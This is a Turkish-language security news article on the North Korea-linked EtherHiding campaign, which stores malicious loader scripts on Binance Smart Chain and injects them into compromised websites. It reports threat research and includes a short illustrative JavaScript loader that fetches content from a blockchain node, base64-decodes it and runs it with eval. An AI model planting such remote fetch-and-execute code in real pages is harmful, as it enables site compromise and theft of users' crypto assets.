Son aylarda, Kuzey Kore bağlantılı tehdit aktörleri tarafından EtherHiding adı verilen karmaşık bir kötü amaçlı yazılım kampanyası ortaya çıktı ve bu kampanya, kripto para borsalarının ve dünya çapındaki kullanıcılarının karşı karşıya olduğu siber güvenlik risklerini keskin bir şekilde artırdı.
Kampanya, saldırganların yeni dijital tedarik zinciri açıklarından yararlanmak için taktik değiştirmesiyle, yasa dışı kripto işlemlerine yönelik artan düzenleyici baskıların ardından ortaya çıktı.
EtherHiding ilk olarak hedefli kimlik avı kampanyalarında ortaya çıktı, ancak o zamandan beri kötü amaçlı yükleri gizlice dağıtmak ve güncellemek için merkezi olmayan blockchain teknolojilerinin kullanılmasıyla işaretlenen çok aşamalı bir tehdide dönüştü.
EtherHiding’i diğerlerinden ayıran imza taktiği, aracı komut dosyalarını barındırmak için Binance Smart Chain’den (BSC) yararlanması, böylece geleneksel güvenlik kontrollerini atlatması ve kampanyanın alanlar veya barındırma sağlayıcıları kapatıldıktan sonra bile devam etmesini sağlamasında yatmaktadır.
Saldırganlar, kötü amaçlı yazılımın en son aşamasını getirmek için blockchain’de depolanan içeriğe ulaşan kodu enjekte ederek meşru veya yarı meşru web sitelerini tehlikeye atar.
Bu modüler yaklaşım, operatörlere yüksek derecede çeviklik kazandırarak, kötü amaçlı komut dosyalarının anında güncellenmesine olanak tanır ve geleneksel engelleme listelerinin veya kaldırma isteklerinin etkinliğini azaltır.
Google Cloud araştırmacıları, EtherHiding’in operasyonunu tanımlayıp belgeledi; blockchain ağları tarafından sağlanan kriptografik anonimliğin yenilikçi kullanımını vurgulayarak, adli takip ve operasyonel kesintileri savunucular için önemli ölçüde daha zorlu hale getirdi.
EtherHiding’in etkisi ciddi oldu; yalnızca dijital varlıkların çalınmasını sağlamakla kalmadı, aynı zamanda daha fazla casusluk veya fidye yazılımı faaliyeti için virüslü sistemlere kalıcı erişim sağladı.
Kampanya geliştikçe tarayıcı uzantılarını, sıcak cüzdanları ve hatta popüler DeFi platformlarını hedef almaya başladı ve potansiyel kurban yelpazesini genişletti.
Kampanyanın yeni enfeksiyon zincirlerini yineleme ve yeniden dağıtma yeteneği, birçok eski uç nokta güvenlik çözümünün Kuzey Koreli operatörlerin kullandığı dinamik dağıtım altyapısına ayak uyduramaması nedeniyle kurumsal savunucuları hayal kırıklığına uğrattı.
.webp)
Kripto para platformları, web ve bulut varlıklarını denetleme konusunda yenilenen bir baskı altındadır; çünkü küçük bir yanlış yapılandırma bile EtherHiding’in enjeksiyonu ve daha sonra kullanılması için yollar açabilir.
Enfeksiyon Mekanizması ve JavaScript Yükleri
Bulaşma zinciri genellikle JavaScript’in savunmasız web özelliklerine enjekte edilmesiyle başlar. Bu komut dosyası, benzersiz işlem tanımlayıcıları kullanarak Binance Smart Chain’den ek kodu sessizce yükler.
Yük mekanizması, gizlemeye ve çok katmanlı kodlamaya dayanmakta olup, statik algılamayı giderek zorlaştırmaktadır.
Örneğin, base64 kodlu yükleyici komut dosyaları tarayıcı bağlamı içinde getirilir ve yürütülür; bazen bir sonraki aşama yükünü sağlamak için iframe’ler veya değiştirilmiş olay işleyicileri kullanılır.
Temsili bir kod pasajı, yükleyicinin mantığını gösterir: –
fetch('https://bsc-dataseed.binance.org/')
.then(response => response.json())
.then(data => {
let scriptContent = atob(data.result);
eval(scriptContent);
});Bu tür taktikler, yalnızca kötü amaçlı yükün kaynağını gizlemekle kalmıyor, aynı zamanda hızlı kod güncellemelerine de olanak tanıyor.
Tespit mekanizmaları uyum sağladıkça, EtherHiding operatörleri blok zincirine yeni yükler göndererek enfeksiyon altyapısını kolay erişimden ayırır ve devam eden hırsızlık ve izinsiz giriş operasyonları için dayanıklı bir saldırı platformu sağlar.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
